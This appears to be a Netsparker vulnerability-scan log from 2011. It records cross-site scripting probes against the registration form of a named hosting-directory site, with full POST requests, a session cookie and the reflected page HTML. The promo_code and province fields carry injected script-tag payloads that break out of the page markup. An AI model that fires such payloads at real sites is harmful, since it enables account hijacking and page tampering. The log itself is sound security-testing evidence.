window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE356073792EF848CADED281C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE35607327CF68DE633120606F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE356073598EE309C3FC7663C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073211A6CE19BD1AE4CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE356073FCA98B308F125BBA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE356073F97858D4A7FDDBFAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE3560737BDE7F9BB074ED8BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073C2C99549FAC7B7096F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE356073095ADAA083EF7D91C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE356073A0B70BBB2E681D016F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='325A5101EE3560736CDAA374D48DB31EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073D6F93AB3339D3870C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE3560733A01BD7B24639A30C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073CD8DFA9623597202C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE356073A5922BDB8C629A7EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073B959F8C4BE61F76FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE356073A408DDF4AD0D56E66F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073B83449E6D59782176F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE356073BD50F147FD3C5E776F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | 3
card_number | POST | 3
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | '"--></style></script><script>alert(0x001CF5)</script>
province | POST | 3
retype_e_mail | POST | netsparker@example.com
retype_password | POST | 3
state | POST | 3
zip | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF5)%3c%2fscript%3e&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:48 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='325A5101EE35607336E351B7C730F5B3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='325A5101EE3560730A02D7804F2143FD6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='325A5101EE35607363BC15778A64EDC2C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073C3227D66A868349DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='325A5101EE3560736FBB07600F0ACFDB6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='325A5101EE3560736BBB1B5B9A332E1CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='325A5101EE356073CF5DFCB4D6408D1CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='325A5101EE356073BD0F647A963E087C6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='325A5101EE35607327D6D9F4FEC2E725C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='325A5101EE35607356BC97BBD50054EF6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='325A5101EE35607379319E351BBDA92BC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='325A5101EE356073E76F9D64ECDE5580C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='325A5101EE356073A3528CBD6B228C82C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='325A5101EE356073D314F21FD75C9A00C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='325A5101EE3560732317557903CBFCB6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='325A5101EE356073A10958FDC418F05FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='325A5101EE356073B557E03D0E69EE0B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='325A5101EE356073A2CB9B9C22CC2E7E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='325A5101EE3560735141AE2D86AA09356F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter | Type | Value
account_type | POST | 1
address | POST | 3
address2 | POST | 3
B1 | POST | Create An Account!
bill_address | POST | 3
bill_address2 | POST | 3
bill_city | POST | 3
bill_country | POST | 240
bill_phone | POST | 3
bill_province | POST | 3
bill_state | POST | 3
bill_zip | POST | 3
card_number | POST | 3
card_type | POST | 1
city | POST | 3
company_name | POST | Smith
copy_from_cont | POST | 1
country | POST | 240
deposit | POST | 3
e_mail | POST | netsparker@example.com
expire_date | POST | 3
first_name | POST | Smith
last_name | POST | Smith
owner_first_name | POST | Smith
owner_last_name | POST | Smith
password | POST | 3
phone | POST | 3
promo_code | POST | 3
province | POST | '"--></style></script><script>alert(0x001CF6)</script>
retype_e_mail | POST | netsparker@example.com
retype_password | POST | 3
state | POST | 3
zip | POST | 3
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060
Content-Length: 583
Accept-Encoding: gzip, deflate

account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001CF6)%3c%2fscript%3e&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
